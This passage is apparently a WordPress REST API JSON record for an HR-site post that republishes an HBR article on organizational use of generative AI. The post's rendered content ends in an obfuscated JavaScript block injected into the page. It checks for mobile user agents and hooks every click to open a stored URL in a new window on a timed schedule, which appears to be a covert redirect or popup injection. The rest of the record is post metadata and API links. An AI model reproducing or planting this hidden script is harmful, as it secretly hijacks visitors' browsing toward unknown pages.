)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>?Editor&#8217;s Note: SHRM has partnered with&nbsp;Harvard Business Review&nbsp;to bring you relevant articles on key HR topics and strategies.&nbsp; While the question of how organizations can (and should) use AI&nbsp;isn&#8217;t a new one, the stakes and urgency of finding answers have skyrocketed with the release of ChatGPT, Midjourney, and other generative AI tools. Everywhere, people are [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":156929,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[363,323],"tags":[],"class_list":["post-156928","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hr-news","category-technology-strategies"],"_links":{"self":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts\/156928","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/comments?post=156928"}],"version-history":[{"count":0,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts\/156928\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/media\/156929"}],"wp:attachment":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/media?parent=156928"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/categories?post=156928"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/tags?post=156928"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}